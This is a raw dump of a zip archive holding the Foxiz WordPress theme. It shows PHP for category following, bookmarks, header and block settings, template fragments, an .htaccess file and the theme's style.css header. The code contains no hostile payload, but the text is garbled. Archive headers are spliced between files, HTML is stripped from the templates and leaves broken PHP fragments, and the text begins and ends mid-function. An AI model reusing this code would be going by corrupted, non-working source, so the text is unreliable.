get_user_meta( get_current_user_id(), $this->meta_category_ID, true ); if ( ! empty( $ids ) && is_array( $ids ) && count( $ids ) ) { return $ids; } } $data = array(); $counter = 1; $categories = get_categories( array( 'orderby' => 'count', 'order' => 'DESC' ) ); foreach ( $categories as $category ) { array_push( $data, $category->term_id ); if ( $counter >= 4 ) { break; } $counter ++; } return $data; } /** follow toggle */ public function follow_toggle() { if ( empty( $_POST['cid'] ) && ! is_user_logged_in() ) { wp_send_json( '', null ); } $category_id = intval( $_POST['cid'] ); $response = array( 'action' => 'added', ); if ( is_user_logged_in() ) { $user_id = get_current_user_id(); $followed = get_user_meta( $user_id, $this->meta_category_ID, true ); if ( empty( $followed ) || ! is_array( $followed ) ) { $followed = array(); } $key = array_search( $category_id, $followed ); if ( false === $key ) { array_push( $followed, $category_id ); } else { unset( $followed[ $key ] ); $response['action'] = 'removed'; } update_user_meta( $user_id, $this->meta_category_ID, array_unique( $followed ) ); } wp_send_json( $response, null ); } /** * @param $category_id * * @return bool */ public function is_followed( $category_id ) { if ( ! is_user_logged_in() ) { return false; } $data = get_user_meta( get_current_user_id(), $this->meta_category_ID, true ); if ( empty( $data ) || ! is_array( $data ) ) { return false; } else { return in_array( $category_id, $data ); } } } } PK!/"!"!bookmark/templates.phpnu[ 'uid_saved', 'bookmark_action' => true, 'classes' => 'saved-content', ) ); unset( $settings['pagination'] ); $image_description = foxiz_get_option( 'saved_image' ); $image_description_dark = foxiz_get_option( 'saved_image_dark' ); $heading_classes = 'bookmark-section-header'; if ( ! empty( $settings['pattern'] ) && '-1' !== (string) $settings['pattern'] ) { $heading_classes .= ' is-pattern pattern-' . esc_attr( $settings['pattern'] ); } else { $heading_classes .= ' solid-bg'; } $_query = Foxiz_Bookmark::get_instance()->get_query(); ?>
<?php echo esc_attr( $image_description['alt'] ); ?> <?php echo esc_attr( $image_description_dark['alt'] ); ?> <?php echo esc_attr( $image_description['alt'] ); ?>

have_posts() ) : foxiz_the_blog( $settings, $_query ); else : ?>

' ); ?>

foxiz_get_option( 'interest_layout' ), 'url' => foxiz_get_option( 'interest_url' ), 'follow' => true, 'title_tag' => 'h4', 'count_posts' => true, ); ?>
<?php echo esc_attr( $image_description['alt'] ); ?> <?php echo esc_attr( $image_description_dark['alt'] ); ?> <?php echo esc_attr( $image_description['alt'] ); ?>

'uid_rec', ); $settings = foxiz_get_archive_page_settings( 'recommended_', $settings ); if ( is_user_logged_in() ) { $settings['categories'] = Foxiz_Bookmark::get_instance()->get_user_categories(); if ( ! is_array( $settings['categories'] ) || ! count( $settings['categories'] ) ) { $settings['order'] = 'popular_m'; } } elseif ( function_exists( 'pvc_get_post_views' ) ) { $settings['order'] = 'popular'; } else { $settings['order'] = 'comment_count'; } $_query = foxiz_query( $settings ); if ( ! $_query->have_posts() ) { return false; } ?>
get_user_categories(); $settings['classes'] = 'block-follow'; if ( empty( $settings['columns'] ) ) { $settings['columns'] = 5; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 10; } foxiz_block_open_tag( $settings ); ?>
Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!\4II style.cssnu[/* Theme Name: Foxiz Theme URI: https://tf01.themeruby.com Author: Theme-Ruby Author URI: https://themeforest.net/user/theme-ruby/ Description: Foxiz - WordPress Newspaper News and Magazine Theme Requires at least: 5.3 Tested up to: 5.9 Requires PHP: 5.6 Text Domain: foxiz Version: 1.4 Tags: custom-background, custom-menu, featured-images, theme-options, custom-colors, translation-ready, threaded-comments, translation-ready License: Themeforest Licence License URI: http://themeforest.net/licenses/standard */PK!t footer.phpnu[
PK!p8 bookmark.phpnu[

get_queried_object_id(); if ( ! empty( $data[ $category_id ]['header_template'] ) || foxiz_get_option( 'category_header_template' ) ) { return $template_style; } if ( ! empty( $data[ $category_id ]['header_style'] ) ) { $header_style = $data[ $category_id ]['header_style']; } else { if ( ! empty( $category_header_style ) ) { $header_style = $category_header_style; } } } elseif ( is_search() ) { if ( foxiz_get_option( 'search_header_template' ) ) { return $template_style; } $search_header_style = foxiz_get_option( 'search_header_style' ); if ( ! empty( $search_header_style ) ) { $header_style = $search_header_style; } } elseif ( is_home() ) { if ( foxiz_get_option( 'blog_header_template' ) ) { return $template_style; } $blog_header_style = foxiz_get_option( 'blog_header_style' ); if ( ! empty( $blog_header_style ) ) { $header_style = $blog_header_style; } } if ( empty( $header_style ) ) { $header_style = '1'; } return $header_style; } } if ( ! function_exists( 'foxiz_get_header_settings' ) ) { /** * @param $prefix * * @return array * get header settings */ function foxiz_get_header_settings( $prefix ) { $prefix = trim( $prefix ) . '_'; $settings = foxiz_get_option(); $settings['more'] = foxiz_get_option( $prefix . 'more' ); $settings['sub_scheme'] = foxiz_get_option( $prefix . 'sub_scheme' ); $settings['nav_style'] = foxiz_get_option( $prefix . 'nav_style' ); if ( is_singular() ) { $nav_style = rb_get_meta( 'nav_style' ); if ( ! empty( $nav_style ) && 'default' !== $nav_style ) { $settings['nav_style'] = $nav_style; } } elseif ( is_category() ) { $nav_style = foxiz_get_option( 'category_nav_style' ); if ( ! empty( $nav_style ) ) { $settings['nav_style'] = $nav_style; } } elseif ( is_search() ) { $nav_style = foxiz_get_option( 'search_nav_style' ); if ( ! empty( $nav_style ) ) { $settings['nav_style'] = $nav_style; } } elseif ( is_home() ) { $nav_style = foxiz_get_option( 'blog_nav_style' ); if ( ! empty( $nav_style ) ) { $settings['nav_style'] = $nav_style; } } $settings['header_socials'] = foxiz_get_option( $prefix . 'header_socials' ); if ( empty( $settings['transprent_mobile_logo']['url'] ) ) { $settings['transprent_mobile_logo'] = foxiz_get_option( 'transparent_retina_logo' ); } return $settings; } } if ( ! function_exists( 'foxiz_get_design_standard_block' ) ) { /** * @param array $settings * @param string $prefix * * @return array|mixed * get module settings */ function foxiz_get_design_standard_block( $settings = array(), $prefix = '' ) { if ( ! empty( $settings['design_override'] ) ) { return $settings; } if ( '_' !== substr( $prefix, - 1 ) ) { $prefix = $prefix . '_'; } if ( ! is_array( $settings ) ) { $settings = array(); } if ( empty( $settings['crop_size'] ) ) { $settings['crop_size'] = foxiz_get_option( $prefix . 'crop_size' ); } if ( empty( $settings['featured_position'] ) ) { $settings['featured_position'] = foxiz_get_option( $prefix . 'featured_position' ); } if ( empty( $settings['entry_category'] ) ) { $settings['entry_category'] = foxiz_get_option( $prefix . 'entry_category' ); } elseif ( '-1' === (string) $settings['entry_category'] ) { $settings['entry_category'] = false; } if ( empty( $settings['hide_category'] ) ) { $settings['hide_category'] = foxiz_get_option( $prefix . 'hide_category' ); } elseif ( '-1' === (string) $settings['hide_category'] ) { $settings['hide_category'] = false; } if ( ! empty( $settings['entry_meta_bar'] ) && '-1' === (string) $settings['entry_meta_bar'] ) { $settings['entry_meta'] = []; } else { if ( empty( $settings['entry_meta_bar'] ) || 'custom' !== (string) $settings['entry_meta_bar'] ) { $settings['entry_meta'] = foxiz_get_option( $prefix . 'entry_meta' ); } else { $settings['entry_meta'] = explode( ',', trim( strval( $settings['entry_meta'] ) ) ); $settings['entry_meta'] = array_map( 'trim', $settings['entry_meta'] ); } } if ( empty( $settings['tablet_hide_meta'] ) ) { $settings['tablet_hide_meta'] = foxiz_get_option( $prefix . 'tablet_hide_meta' ); } else { if ( '-1' !== (string) $settings['tablet_hide_meta'] ) { $settings['tablet_hide_meta'] = explode( ',', trim( strval( $settings['tablet_hide_meta'] ) ) ); $settings['tablet_hide_meta'] = array_map( 'trim', $settings['tablet_hide_meta'] ); } else { $settings['tablet_hide_meta'] = false; } } if ( empty( $settings['mobile_hide_meta'] ) ) { $settings['mobile_hide_meta'] = foxiz_get_option( $prefix . 'mobile_hide_meta' ); } else { if ( '-1' !== (string) $settings['mobile_hide_meta'] ) { $settings['mobile_hide_meta'] = explode( ',', trim( strval( $settings['mobile_hide_meta'] ) ) ); $settings['mobile_hide_meta'] = array_map( 'trim', $settings['mobile_hide_meta'] ); } else { $settings['mobile_hide_meta'] = false; } } if ( empty( $settings['review'] ) ) { $settings['review'] = foxiz_get_option( $prefix . 'review' ); } elseif ( '-1' === (string) $settings['review'] ) { $settings['review'] = false; } if ( empty( $settings['review_meta'] ) ) { $settings['review_meta'] = foxiz_get_option( $prefix . 'review_meta' ); } elseif ( '-1' === (string) $settings['review_meta'] ) { $settings['review_meta'] = false; } if ( empty( $settings['entry_format'] ) ) { $settings['entry_format'] = foxiz_get_option( $prefix . 'entry_format' ); } elseif ( '-1' === (string) $settings['entry_format'] ) { $settings['entry_format'] = false; } if ( empty( $settings['bookmark'] ) ) { $settings['bookmark'] = foxiz_get_option( $prefix . 'bookmark' ); } elseif ( '-1' === (string) $settings['bookmark'] ) { $settings['bookmark'] = false; } if ( empty( $settings['excerpt'] ) ) { $settings['excerpt_length'] = foxiz_get_option( $prefix . 'excerpt_length' ); $settings['excerpt_source'] = foxiz_get_option( $prefix . 'excerpt_source' ); } if ( empty( $settings['hide_excerpt'] ) ) { $settings['hide_excerpt'] = foxiz_get_option( $prefix . 'hide_excerpt' ); } elseif ( '-1' === (string) $settings['hide_excerpt'] ) { $settings['hide_excerpt'] = false; } if ( empty( $settings['readmore'] ) ) { $settings['readmore'] = foxiz_get_option( $prefix . 'readmore' ); } elseif ( '-1' === (string) $settings['readmore'] ) { $settings['readmore'] = false; } if ( ! empty( $settings['readmore'] ) ) { $settings['readmore'] = foxiz_get_option( 'readmore_label' ); if ( empty( $settings['readmore'] ) ) { $settings['readmore'] = foxiz_html__( 'Read More', 'foxiz' ); } else { /** make sure this string compatible with WPML plugins */ $settings['readmore'] = apply_filters( 'the_title_rss', $settings['readmore'], 10 ); } } if ( empty( $settings['title_tag'] ) ) { $settings['title_tag'] = foxiz_get_option( $prefix . 'title_tag' ); } if ( empty( $settings['sub_title_tag'] ) ) { $settings['sub_title_tag'] = foxiz_get_option( $prefix . 'sub_title_tag' ); } if ( empty( $settings['sub_sub_title_tag'] ) ) { $settings['sub_sub_title_tag'] = foxiz_get_option( $prefix . 'sub_sub_title_tag' ); } if ( ! empty( $settings['sponsor_meta'] ) && '-1' === (string) $settings['sponsor_meta'] ) { $settings['sponsor_meta'] = false; } elseif ( empty( $settings['sponsor_meta'] ) ) { $settings['sponsor_meta'] = foxiz_get_option( $prefix . 'sponsor_meta' ); } if ( empty( $settings['title_classes'] ) ) { $settings['title_classes'] = foxiz_get_option( $prefix . 'title_classes' ); } if ( empty( $settings['counter'] ) ) { $settings['counter'] = foxiz_get_option( $prefix . 'counter' ); } elseif ( '-1' === (string) $settings['counter'] ) { $settings['counter'] = false; } if ( empty( $settings['box_style'] ) ) { $settings['box_style'] = foxiz_get_option( $prefix . 'box_style' ); } if ( empty( $settings['center_mode'] ) ) { $settings['center_mode'] = foxiz_get_option( $prefix . 'center_mode' ); } elseif ( '-1' === (string) $settings['center_mode'] ) { $settings['center_mode'] = false; } if ( empty( $settings['middle_mode'] ) ) { $settings['middle_mode'] = foxiz_get_option( $prefix . 'middle_mode' ); } if ( ! empty( $settings['slider'] ) && '-1' === (string) $settings['slider'] ) { $settings['slider'] = false; } if ( ! empty( $settings['carousel'] ) && '-1' === (string) $settings['carousel'] ) { $settings['carousel'] = false; } if ( ! empty( $settings['carousel_dot'] ) && '-1' === (string) $settings['carousel_dot'] ) { $settings['carousel_dot'] = false; } if ( ! empty( $settings['carousel_nav'] ) && '-1' === (string) $settings['carousel_nav'] ) { $settings['carousel_nav'] = false; } if ( empty( $settings['slider_play'] ) ) { $settings['slider_play'] = foxiz_get_option( 'slider_play' ); } elseif ( '-1' === (string) $settings['slider_play'] ) { $settings['slider_play'] = false; } if ( empty( $settings['slider_speed'] ) ) { $settings['slider_speed'] = foxiz_get_option( 'slider_speed' ); } if ( empty( $settings['slider_fmode'] ) ) { $settings['slider_fmode'] = foxiz_get_option( 'slider_fmode' ); } elseif ( '-1' === (string) $settings['slider_fmode'] ) { $settings['slider_fmode'] = false; } /** disable carousel & sliders */ if ( foxiz_is_amp() ) { $settings['carousel'] = false; $settings['slider'] = false; } return $settings; } } if ( ! function_exists( 'foxiz_get_design_builder_block' ) ) { /** * @param $settings * @param $prefix * * @return array|mixed */ function foxiz_get_design_builder_block( $settings ) { if ( ! is_array( $settings ) ) { $settings = array(); } if ( ! empty( $settings['entry_category'] ) && '-1' === (string) $settings['entry_category'] ) { $settings['entry_category'] = false; } if ( ! empty( $settings['entry_format'] ) && '-1' === (string) $settings['entry_format'] ) { $settings['entry_format'] = false; } if ( ! empty( $settings['entry_meta'] ) ) { $settings['entry_meta'] = explode( ',', trim( strval( $settings['entry_meta'] ) ) ); $settings['entry_meta'] = array_map( 'trim', $settings['entry_meta'] ); } if ( ! empty( $settings['tablet_hide_meta'] ) ) { if ( '-1' !== (string) $settings['tablet_hide_meta'] ) { $settings['tablet_hide_meta'] = explode( ',', trim( strval( $settings['tablet_hide_meta'] ) ) ); $settings['tablet_hide_meta'] = array_map( 'trim', $settings['tablet_hide_meta'] ); } else { $settings['tablet_hide_meta'] = false; } } if ( ! empty( $settings['mobile_hide_meta'] ) ) { if ( '-1' !== (string) $settings['mobile_hide_meta'] ) { $settings['mobile_hide_meta'] = explode( ',', trim( strval( $settings['mobile_hide_meta'] ) ) ); $settings['mobile_hide_meta'] = array_map( 'trim', $settings['mobile_hide_meta'] ); } else { $settings['mobile_hide_meta'] = false; } } if ( ! empty( $settings['review'] ) && ( '-1' === (string) $settings['review'] ) ) { $settings['review'] = false; } if ( ! empty( $settings['review_meta'] ) && ( '-1' === (string) $settings['review_meta'] ) ) { $settings['review_meta'] = false; } if ( ! empty( $settings['bookmark'] ) && ( '-1' === (string) $settings['bookmark'] ) ) { $settings['bookmark'] = false; } if ( ! empty( $settings['counter'] ) && ( '-1' === (string) $settings['counter'] ) ) { $settings['counter'] = false; } if ( empty( $settings['readmore'] ) || '-1' === (string) $settings['readmore'] ) { $settings['readmore'] = false; } else { $settings['readmore'] = foxiz_get_option( 'readmore_label' ); if ( empty( $settings['readmore'] ) ) { $settings['readmore'] = foxiz_html__( 'Read More', 'foxiz' ); } } if ( ! empty( $settings['sponsor_meta'] ) && ( '-1' === (string) $settings['sponsor_meta'] ) ) { $settings['sponsor_meta'] = false; } elseif ( empty( $settings['sponsor_meta'] ) ) { $settings['sponsor_meta'] = 1; } if ( ! empty( $settings['center_mode'] ) && ( '-1' === (string) $settings['center_mode'] ) ) { $settings['center_mode'] = false; } if ( ! empty( $settings['slider'] ) && '-1' === (string) $settings['slider'] ) { $settings['slider'] = false; } if ( ! empty( $settings['carousel'] ) && '-1' === (string) $settings['carousel'] ) { $settings['carousel'] = false; } if ( ! empty( $settings['carousel_dot'] ) && '-1' === (string) $settings['carousel_dot'] ) { $settings['carousel_dot'] = false; } if ( ! empty( $settings['carousel_nav'] ) && '-1' === (string) $settings['carousel_nav'] ) { $settings['carousel_nav'] = false; } if ( empty( $settings['slider_play'] ) ) { $settings['slider_play'] = foxiz_get_option( 'slider_play' ); } elseif ( '-1' === (string) $settings['slider_play'] ) { $settings['slider_play'] = false; } if ( empty( $settings['slider_speed'] ) ) { $settings['slider_speed'] = foxiz_get_option( 'slider_speed' ); } if ( empty( $settings['slider_fmode'] ) ) { $settings['slider_fmode'] = foxiz_get_option( 'slider_fmode' ); } elseif ( '-1' === (string) $settings['slider_fmode'] ) { $settings['slider_fmode'] = false; } /** disable carousel & sliders */ if ( foxiz_is_amp() ) { $settings['carousel'] = false; $settings['slider'] = false; } return $settings; } } if ( ! function_exists( 'foxiz_is_featured_image' ) ) { /** * @param string $size * * @return bool * check featured image */ function foxiz_is_featured_image( $size = 'full' ) { if ( ! has_post_thumbnail() ) { return false; } $thumbnail = get_the_post_thumbnail( null, $size ); if ( empty( $thumbnail ) ) { return false; } return true; } } if ( ! function_exists( 'foxiz_detect_dynamic_query' ) ) { /** * @param $settings * * @return mixed * foxiz_detect_query */ function foxiz_detect_dynamic_query( $settings ) { if ( ! empty( $settings['category'] ) && 'dynamic' === (string) $settings['category'] ) { if ( is_category() ) { global $wp_query; $settings['category'] = $wp_query->get_queried_object_id(); } } if ( empty( $settings['unique'] ) || '-1' === (string) $settings['unique'] ) { $settings['unique'] = false; } return $settings; } } if ( ! function_exists( 'foxiz_get_single_setting' ) ) { /** * @param $name * @param string $opt_name * @param string $post_id * * @return false|mixed|void */ function foxiz_get_single_setting( $name, $opt_name = '', $post_id = '' ) { if ( empty( $post_id ) ) { $post_id = get_the_ID(); } $setting = rb_get_meta( $name, $post_id ); if ( empty( $setting ) || 'default' === $setting ) { if ( empty( $opt_name ) ) { $opt_name = 'single_post_' . $name; } $setting = foxiz_get_option( $opt_name ); } if ( ! is_array( $setting ) && '-1' === (string) $setting ) { return false; } return $setting; } } if ( ! function_exists( 'foxiz_is_review_post' ) ) { /** * @param string $post_id * * @return bool */ function foxiz_is_review_post( $post_id = '' ) { if ( empty( $post_id ) ) { $post_id = get_the_ID(); } $review = rb_get_meta( 'review', $post_id ); if ( empty( $review ) || '-1' === (string) $review ) { return false; } return true; } } if ( ! function_exists( 'foxiz_get_review_settings' ) ) { /** * @param string $post_id * * @return array|false */ function foxiz_get_review_settings( $post_id = '' ) { if ( empty( $post_id ) ) { $post_id = get_the_ID(); } if ( ! foxiz_is_review_post( $post_id ) ) { return false; } $settings = array( 'average' => '', 'title' => rb_get_meta( 'review_title', $post_id ), 'type' => foxiz_get_single_setting( 'review_type' ), 'criteria' => rb_get_meta( 'review_criteria', $post_id ), 'user' => foxiz_get_single_setting( 'user_can_review' ), 'image' => foxiz_get_single_setting( 'review_image' ), 'meta' => rb_get_meta( 'review_meta', $post_id ), 'pros' => rb_get_meta( 'review_pros', $post_id ), 'cons' => rb_get_meta( 'review_cons', $post_id ), 'summary' => rb_get_meta( 'review_summary', $post_id ), 'button' => rb_get_meta( 'review_button', $post_id ), 'destination' => rb_get_meta( 'review_destination', $post_id ), 'price' => rb_get_meta( 'review_price', $post_id ), 'currency' => rb_get_meta( 'review_currency', $post_id ), 'schema' => foxiz_get_single_setting( 'review_schema' ), 'user_rating' => get_post_meta( $post_id, 'foxiz_user_rating', true ) ); if ( is_array( $settings['criteria'] ) ) { $index = 0; $total = 0; foreach ( $settings['criteria'] as $item ) { if ( ! empty( $item['rating'] ) ) { $value = floatval( $item['rating'] ); if ( empty( $settings['type'] ) || 'star' === $settings['type'] ) { if ( $value > 5 ) { $value = 5; } } else { if ( $value > 10 ) { $value = 10; } } $total += $value; $index ++; } } if ( ! empty( $index ) && ! empty( $total ) ) { $settings['average'] = round( $total / $index, 1 ); } } return $settings; } } if ( ! function_exists( 'foxiz_get_single_sidebar_position' ) ) { /** * @param string $name * @param string $opt_name * @param string $post_id * * @return false|mixed|string|void */ function foxiz_get_single_sidebar_position( $name = 'sidebar_position', $opt_name = '', $post_id = '' ) { if ( foxiz_is_amp() && foxiz_get_option( 'amp_disable_single_sidebar' ) ) { return 'none'; } if ( empty( $post_id ) ) { $post_id = get_the_ID(); } $setting = ''; if ( ! empty( $name ) ) { $setting = rb_get_meta( $name, $post_id ); } if ( empty( $setting ) || 'default' === $setting ) { if ( empty( $opt_name ) ) { $opt_name = 'single_post_' . $name; } $setting = foxiz_get_option( $opt_name ); } if ( empty( $setting ) || 'default' === $setting ) { $setting = foxiz_get_option( 'global_sidebar_position' ); } return $setting; } } if ( ! function_exists( 'foxiz_get_single_layout' ) ) { /** * @return false|mixed|void */ function foxiz_get_single_layout() { $post_format = get_post_format( get_the_ID() ); switch ( $post_format ) { case 'video' : $layout = foxiz_get_single_setting( 'video_layout' ); break; case 'audio' : $layout = foxiz_get_single_setting( 'audio_layout' ); break; case 'gallery' : $layout = foxiz_get_single_setting( 'gallery_layout' ); break; default: $layout = foxiz_get_single_setting( 'layout' ); } if ( empty( $layout ) ) { $layout = 'standard_1'; } return $layout; } } if ( ! function_exists( 'foxiz_is_sponsored_post' ) ) { /** * @param string $post_id * * @return bool */ function foxiz_is_sponsored_post( $post_id = '' ) { if ( empty( $post_id ) ) { $post_id = get_the_ID(); } $sponsor = rb_get_meta( 'sponsor_post', $post_id ); if ( ! empty( $sponsor ) && '1' === (string) $sponsor ) { return true; } return false; } } if ( ! function_exists( 'foxiz_get_related_data' ) ) { /** * @param array $settings * * @return WP_Query */ function foxiz_get_related_data( $settings = array() ) { $params = array( 'no_found_rows' => true, ); if ( ! empty( $settings['total'] ) ) { $params['posts_per_page'] = $settings['total']; } if ( ! empty( $settings['offset'] ) ) { $params['offset'] = $settings['offset']; } if ( ! empty( $settings['ids'] ) ) { $params['post_in'] = esc_attr( $settings['ids'] ); } if ( ! empty( $settings['post_id'] ) ) { $params['post_id'] = esc_attr( $settings['post_id'] ); } return foxiz_query_related( $params ); } } if ( ! function_exists( 'foxiz_get_single_sticky_sidebar' ) ) { /** * @param string $prefix * * @return bool */ function foxiz_get_single_sticky_sidebar( $prefix = 'single_post_' ) { $setting = foxiz_get_option( $prefix . 'sticky_sidebar' ); if ( empty( $setting ) || 'default' === $setting ) { $setting = foxiz_get_option( 'sticky_sidebar' ); }; if ( '1' === (string) $setting ) { return true; } return false; } } if ( ! function_exists( 'foxiz_get_category_page_settings' ) ) { function foxiz_get_category_page_settings( $category_id = '' ) { if ( ! is_category() ) { return false; } if ( empty( $category_id ) ) { global $wp_query; $category_id = $wp_query->get_queried_object_id(); } $prefix = 'category_'; $data = get_option( 'foxiz_category_meta', array() ); if ( ! isset( $data[ $category_id ] ) ) { $data[ $category_id ] = array(); } $settings = $data[ $category_id ]; $settings['category'] = $category_id; $settings['category_name'] = get_cat_name( $category_id ); $settings['uuid'] = 'uid_c' . $category_id; if ( empty( $settings['category_header'] ) ) { $settings['category_header'] = foxiz_get_option( $prefix . 'category_header' ); } if ( empty( $settings['breadcrumb'] ) ) { $settings['breadcrumb'] = foxiz_get_option( $prefix . 'breadcrumb' ); } if ( '-1' === (string) $settings['breadcrumb'] ) { $settings['breadcrumb'] = false; } if ( empty( $settings['featured_image'] ) || ! is_array( $settings['featured_image'] ) || ! count( $settings['featured_image'] ) ) { $settings['featured_image'] = foxiz_get_option( $prefix . 'featured_image' ); if ( ! empty( $settings['featured_image'] ) ) { $settings['featured_image'] = explode( ',', $settings['featured_image'] ); } } if ( empty( $settings['pattern'] ) ) { $settings['pattern'] = foxiz_get_option( $prefix . 'pattern' ); } if ( empty( $settings['subcategory'] ) ) { $settings['subcategory'] = foxiz_get_option( $prefix . 'subcategory' ); } if ( '-1' === (string) $settings['subcategory'] ) { $settings['subcategory'] = false; } if ( empty( $settings['template'] ) ) { $settings['template'] = foxiz_get_option( $prefix . 'template' ); } if ( empty( $settings['template_display'] ) ) { $settings['template_display'] = foxiz_get_option( $prefix . 'template_display' ); } if ( empty( $settings['template_global'] ) ) { $settings['template_global'] = foxiz_get_option( $prefix . 'template_global' ); } if ( empty( $settings['blog_heading'] ) ) { $settings['blog_heading'] = foxiz_get_option( $prefix . 'blog_heading' ); } if ( empty( $settings['blog_heading_layout'] ) ) { $settings['blog_heading_layout'] = foxiz_get_option( $prefix . 'blog_heading_layout' ); } if ( empty( $settings['blog_heading_tag'] ) ) { $settings['blog_heading_tag'] = foxiz_get_option( $prefix . 'blog_heading_tag' ); } if ( empty( $settings['posts_per_page'] ) ) { $settings['posts_per_page'] = foxiz_get_option( $prefix . 'posts_per_page' ); } if ( empty( $settings['pagination'] ) ) { $settings['pagination'] = foxiz_get_option( $prefix . 'pagination' ); } if ( empty( $settings['layout'] ) ) { $settings['layout'] = foxiz_get_option( $prefix . 'layout' ); } if ( empty( $settings['columns'] ) ) { $settings['columns'] = foxiz_get_option( $prefix . 'columns' ); } if ( empty( $settings['columns_tablet'] ) ) { $settings['columns_tablet'] = foxiz_get_option( $prefix . 'columns_tablet' ); } if ( empty( $settings['columns_mobile'] ) ) { $settings['columns_mobile'] = foxiz_get_option( $prefix . 'columns_mobile' ); } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = foxiz_get_option( $prefix . 'column_gap' ); } if ( empty( $settings['sidebar_position'] ) ) { $settings['sidebar_position'] = foxiz_get_option( $prefix . 'sidebar_position' ); } if ( empty( $settings['sidebar_name'] ) || 'default' === $settings['sidebar_name'] ) { $settings['sidebar_name'] = foxiz_get_option( $prefix . 'sidebar_name' ); } if ( empty( $settings['sticky_sidebar'] ) ) { $settings['sticky_sidebar'] = foxiz_get_option( $prefix . 'sticky_sidebar' ); if ( empty( $settings['sticky_sidebar'] ) ) { $settings['sticky_sidebar'] = foxiz_get_option( 'sticky_sidebar' ); } } if ( '-1' === (string) $settings['sticky_sidebar'] ) { $settings['sticky_sidebar'] = false; } /** blog design */ if ( empty( $settings['crop_size'] ) ) { $settings['crop_size'] = foxiz_get_option( $prefix . 'crop_size' ); } if ( empty( $settings['entry_category'] ) ) { $settings['entry_category'] = foxiz_get_option( $prefix . 'entry_category' ); } if ( empty( $settings['entry_meta_bar'] ) ) { $settings['entry_meta_bar'] = foxiz_get_option( $prefix . 'entry_meta_bar' ); if ( ! empty( $settings['entry_meta_bar'] ) && 'custom' === $settings['entry_meta_bar'] ) { $settings['entry_meta'] = foxiz_get_option( $prefix . 'entry_meta' ); if ( is_array( $settings['entry_meta'] ) ) { $settings['entry_meta'] = implode( ',', $settings['entry_meta'] ); } } } if ( empty( $settings['review'] ) ) { $settings['review'] = foxiz_get_option( $prefix . 'review' ); } if ( empty( $settings['review_meta'] ) ) { $settings['review_meta'] = foxiz_get_option( $prefix . 'review_meta' ); } if ( empty( $settings['entry_format'] ) ) { $settings['entry_format'] = foxiz_get_option( $prefix . 'entry_format' ); } if ( empty( $settings['bookmark'] ) ) { $settings['bookmark'] = foxiz_get_option( $prefix . 'bookmark' ); } if ( empty( $settings['excerpt'] ) ) { $settings['excerpt'] = foxiz_get_option( $prefix . 'excerpt' ); if ( ! empty( $settings['excerpt'] ) ) { $settings['excerpt_length'] = foxiz_get_option( $prefix . 'excerpt_length' ); $settings['excerpt_source'] = foxiz_get_option( $prefix . 'excerpt_source' ); } } if ( empty( $settings['readmore'] ) ) { $settings['readmore'] = foxiz_get_option( $prefix . 'readmore' ); } if ( empty( $settings['title_tag'] ) ) { $settings['title_tag'] = foxiz_get_option( $prefix . 'title_tag' ); } if ( empty( $settings['hide_category'] ) ) { $settings['hide_category'] = foxiz_get_option( $prefix . 'hide_category' ); } if ( empty( $settings['tablet_hide_meta'] ) ) { $settings['tablet_hide_meta'] = foxiz_get_option( $prefix . 'tablet_hide_meta' ); } if ( empty( $settings['mobile_hide_meta'] ) ) { $settings['mobile_hide_meta'] = foxiz_get_option( $prefix . 'mobile_hide_meta' ); } if ( empty( $settings['hide_excerpt'] ) ) { $settings['hide_excerpt'] = foxiz_get_option( $prefix . 'hide_excerpt' ); } return $settings; } } if ( ! function_exists( 'foxiz_get_archive_page_settings' ) ) { /** * @param string $prefix * @param array $settings * * @return array|mixed */ function foxiz_get_archive_page_settings( $prefix = '', $settings = array() ) { if ( empty( $prefix ) ) { $prefix = 'archive_'; } if ( empty( $settings['uuid'] ) ) { $settings['uuid'] = 'uid_' . $prefix . get_queried_object_id(); } $settings['blog_heading'] = foxiz_get_option( $prefix . 'blog_heading' ); $settings['blog_heading_layout'] = foxiz_get_option( $prefix . 'blog_heading_layout' ); $settings['blog_heading_tag'] = foxiz_get_option( $prefix . 'blog_heading_tag' ); $settings['pattern'] = foxiz_get_option( $prefix . 'pattern' ); $settings['template'] = foxiz_get_option( $prefix . 'template' ); $settings['template_bottom'] = foxiz_get_option( $prefix . 'template_bottom' ); $settings['template_display'] = foxiz_get_option( $prefix . 'template_display' ); $settings['template_global'] = foxiz_get_option( $prefix . 'template_global' ); $settings['breadcrumb'] = foxiz_get_option( $prefix . 'breadcrumb' ); $settings['posts_per_page'] = foxiz_get_option( $prefix . 'posts_per_page' ); if ( empty( $settings['posts_per_page'] ) ) { $settings['posts_per_page'] = get_option( 'posts_per_page' ); } $settings['pagination'] = foxiz_get_option( $prefix . 'pagination' ); if ( empty( $settings['pagination'] ) ) { $settings['pagination'] = 'number'; } $settings['layout'] = foxiz_get_option( $prefix . 'layout' ); $settings['columns'] = foxiz_get_option( $prefix . 'columns' ); $settings['columns_tablet'] = foxiz_get_option( $prefix . 'columns_tablet' ); $settings['columns_mobile'] = foxiz_get_option( $prefix . 'columns_mobile' ); $settings['column_gap'] = foxiz_get_option( $prefix . 'column_gap' ); $settings['sidebar_position'] = foxiz_get_option( $prefix . 'sidebar_position' ); $settings['sidebar_name'] = foxiz_get_option( $prefix . 'sidebar_name' ); $settings['sticky_sidebar'] = foxiz_get_option( $prefix . 'sticky_sidebar' ); if ( empty( $settings['sticky_sidebar'] ) ) { $settings['sticky_sidebar'] = foxiz_get_option( 'sticky_sidebar' ); } if ( '-1' === (string) $settings['sticky_sidebar'] ) { $settings['sticky_sidebar'] = false; } $settings['crop_size'] = foxiz_get_option( $prefix . 'crop_size' ); $settings['entry_category'] = foxiz_get_option( $prefix . 'entry_category' ); $settings['entry_meta_bar'] = foxiz_get_option( $prefix . 'entry_meta_bar' ); if ( ! empty( $settings['entry_meta_bar'] ) && 'custom' === $settings['entry_meta_bar'] ) { $settings['entry_meta'] = foxiz_get_option( $prefix . 'entry_meta' ); if ( is_array( $settings['entry_meta'] ) ) { $settings['entry_meta'] = implode( ',', $settings['entry_meta'] ); } } $settings['review'] = foxiz_get_option( $prefix . 'review' ); $settings['review_meta'] = foxiz_get_option( $prefix . 'review_meta' ); $settings['entry_format'] = foxiz_get_option( $prefix . 'entry_format' ); $settings['bookmark'] = foxiz_get_option( $prefix . 'bookmark' ); $settings['excerpt'] = 